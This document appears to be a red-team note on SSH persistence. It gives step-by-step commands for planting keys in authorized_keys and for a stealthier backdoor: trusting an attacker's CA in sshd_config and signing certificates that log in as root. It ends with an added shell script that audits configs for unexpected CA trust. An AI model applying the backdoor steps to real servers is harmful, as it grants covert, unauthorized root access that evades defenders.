Secondary Categories: 02-Persistence
Authorized Keys
By default, SSH allows a remote user to connect using a username and password, but what if that user changes their password? We can use the SSH authorized keys file instead: place our SSH key in the user's ~/.ssh/authorized_keys file to authenticate as that user.
Trusted User CA Keys
What if we want to be a little more stealthy? Defenders will automatically check the ~/.ssh/authorized_keys file for anything suspicious… We can get around this by using a trusted user CA key to sign all our keys and sign in as any user.
# Create a key pair. This command will output two files: the public key and the private key
ssh-keygen -C CA -f ca
Next we need to configure the server with the newly created CA in /etc/ssh/sshd_config:
Copy ca.pub and place it in /etc/ssh/ca.pub.
Edit /etc/ssh/sshd_config to add the line TrustedUserCAKeys /etc/ssh/ca.pub
Restart the SSH server
Then we need to generate a key for a user
ssh-keygen -t ecdsa
Now we need to sign the user key
# This command will sign our user key and output a file called id_ecdsa-cert.pub
ssh-keygen -s ca -I ap3x -n root -z 1 id_ecdsa.pub
# We can inspect the certificate using the following command
ssh-keygen -Lf id_ecdsa-cert.pub
Now we can SSH into any server that trusts our CA key.
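Because this trust lives in sshd_config rather than in any user's authorized_keys file, a review of authorized_keys alone will not show it. The following check is an added example, not part of the original notes: it lists every active TrustedUserCAKeys directive in a config file and flags paths that are not on an expected list. The function names audit_trusted_ca and sample_config and the sample config are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag TrustedUserCAKeys directives in an sshd_config-style file.
# Usage: audit_trusted_ca CONFIG [EXPECTED_CA_PATH ...]
# Prints "<line>:<path>:<EXPECTED|UNEXPECTED>" for each active directive
# (global or inside a Match block); returns 1 if any path is unexpected.
audit_trusted_ca() (
  config=$1; shift
  expected=" $* "          # space-delimited list; paths with spaces unsupported
  awk -v expected="$expected" '
    /^[ \t]*#/ { next }    # comment line
    /^[ \t]*$/ { next }    # blank line
    {
      line = $0
      sub(/^[ \t]+/, "", line)
      match(line, /^[^ \t=]+/)                  # keyword ends at space or "="
      key = tolower(substr(line, 1, RLENGTH))   # sshd keywords ignore case
      val = substr(line, RLENGTH + 1)
      sub(/^[ \t]*=?[ \t]*/, "", val)           # separator: spaces or one "="
      sub(/[ \t]+$/, "", val)
      if (key != "trustedusercakeys" || val == "none") next
      status = index(expected, " " val " ") ? "EXPECTED" : "UNEXPECTED"
      if (status == "UNEXPECTED") bad = 1
      printf "%d:%s:%s\n", NR, val, status
    }
    END { exit bad + 0 }
  ' "$config"
)

# Constructed sample config (not taken from a real host).
sample_config() {
cat <<'EOF'
# constructed sample
Port 22
PasswordAuthentication yes
#TrustedUserCAKeys /etc/ssh/old_ca.pub
trustedusercakeys=/etc/ssh/ca.pub
Match User deploy
    TrustedUserCAKeys /etc/ssh/deploy_ca.pub
EOF
}

# Demo: only the deploy CA is expected, so line 5 is reported as UNEXPECTED.
tmp=$(mktemp)
sample_config > "$tmp"
audit_trusted_ca "$tmp" /etc/ssh/deploy_ca.pub || echo "unexpected CA trust found"
rm -f "$tmp"
```

The parser reads a single file and does not follow Include directives; on a live host, saving the output of `sshd -T` to a file and auditing that covers the effective configuration.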